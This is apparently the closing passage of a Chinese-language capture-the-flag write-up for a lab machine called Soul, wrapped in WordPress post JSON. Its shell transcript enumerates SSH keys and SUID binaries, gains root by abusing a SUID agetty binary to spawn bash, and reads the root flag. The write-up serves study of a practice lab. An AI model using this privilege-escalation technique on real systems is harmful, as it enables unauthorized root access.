peter@soul:\/home\/gabriel$ cd ~\npeter@soul:~$ ls -la\ntotal 24\ndrwxr-xr-x 3 peter peter 4096 Nov 26  2020 .\ndrwxr-xr-x 5 root  root  4096 Nov 26  2020 ..\n-rw-r--r-- 1 peter peter  220 Nov 26  2020 .bash_logout\n-rw-r--r-- 1 peter peter 3526 Nov 26  2020 .bashrc\n-rw-r--r-- 1 peter peter  807 Nov 26  2020 .profile\ndrwx------ 2 peter peter 4096 Nov 26  2020 .ssh\npeter@soul:~$ cd .ssh\npeter@soul:~\/.ssh$ ls -la\ntotal 20\ndrwx------ 2 peter peter 4096 Nov 26  2020 .\ndrwxr-xr-x 3 peter peter 4096 Nov 26  2020 ..\n-rw-r--r-- 1 peter peter  392 Nov 26  2020 authorized_keys\n-rw------- 1 peter peter 1811 Nov 26  2020 id_rsa\n-rw-r--r-- 1 peter peter  392 Nov 26  2020 id_rsa.pub\npeter@soul:~\/.ssh$ echo $SHELL\n\/bin\/bash\npeter@soul:~\/.ssh$ ssh-keygen -y -f id_rsa\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC66JJyq6c+fFjcR\/irMeVryuVZO6ixS\/vcuTDwvV4uwQehPeOWDYUDHVdt1bhJHIjQ+nt+L2y281Fl4JGJLdUpogZjrh+YDMP1oUBjbtHASdI02yWsZ99qw79gJe695OjW5uVvfEJMDkRnrscqvddkbfoPV7XCble0LVHq+3FgET+WkZVUr8nQHq1cz9lF5B8ez4yWfMG5nLOVR9pm8sXxIhWAQitAESKyVKeBmNrlhwx4XO0fW5V\/Ld0N3fuupSD3AUbq\/++gU59CNFaYY50GF+xw1awzHY\/ZvR963BVwKNzKRfpC2OHKFq\/ple5t+BosahGQt3WcMSi5OICDXJeT\npeter@soul:~\/.ssh$ cat id_rsa.pub \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC66JJyq6c+fFjcR\/irMeVryuVZO6ixS\/vcuTDwvV4uwQehPeOWDYUDHVdt1bhJHIjQ+nt+L2y281Fl4JGJLdUpogZjrh+YDMP1oUBjbtHASdI02yWsZ99qw79gJe695OjW5uVvfEJMDkRnrscqvddkbfoPV7XCble0LVHq+3FgET+WkZVUr8nQHq1cz9lF5B8ez4yWfMG5nLOVR9pm8sXxIhWAQitAESKyVKeBmNrlhwx4XO0fW5V\/Ld0N3fuupSD3AUbq\/++gU59CNFaYY50GF+xw1awzHY\/ZvR963BVwKNzKRfpC2OHKFq\/ple5t+BosahGQt3WcMSi5OICDXJeT peter@soul<\/code><\/pre>\n
\u8fd9\u91cc\u5e94\u8be5\u6ca1\u5565\u4e8b\uff1a<\/p>\n
peter@soul:~$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for peter: \npeter@soul:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/sbin\/agetty\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device<\/code><\/pre>\n
\u7a81\u7136\u60f3\u8d77\u6765\u4e4b\u524d\u7684\u90a3\u4e2aagetty<\/code>\u53ef\u4ee5\u5c1d\u8bd5\u63d0\u6743\uff01<\/p>\n
peter@soul:~$ \/usr\/sbin\/agetty -o -p -l \/bin\/bash -a root tty\n\nDebian GNU\/Linux 10 soul tty\n\nsoul login: root (automatic login)\n\npeter@soul:~# whoami;id\nroot\nuid=1002(peter) gid=1002(peter) euid=0(root) groups=1002(peter)<\/code><\/pre>\n
\u770b\u770b\u80fd\u4e0d\u80fd\u8bfb\u53d6\u76f8\u5173\u6587\u4ef6\uff1a<\/p>\n
peter@soul:~# cd \/root \npeter@soul:\/root# ls -la\ntotal 28\ndrwx------  4 root root 4096 Nov 26  2020 .\ndrwxr-xr-x 18 root root 4096 Nov 26  2020 ..\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root 4096 Nov 26  2020 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\ndrwx------  2 root root 4096 Nov 26  2020 .ssh\n-rw-------  1 root root   11 Nov 26  2020 rootflag.txt\npeter@soul:\/root# cat rootflag.txt \nHMVohmygod<\/code><\/pre>\n
\u4e00\u5207\u6b63\u5e38\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Soul \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul] \u2514\u2500$ rustsca […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-861","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/861","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=861"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/861\/revisions"}],"predecessor-version":[{"id":862,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/861\/revisions\/862"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=861"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=861"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=861"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}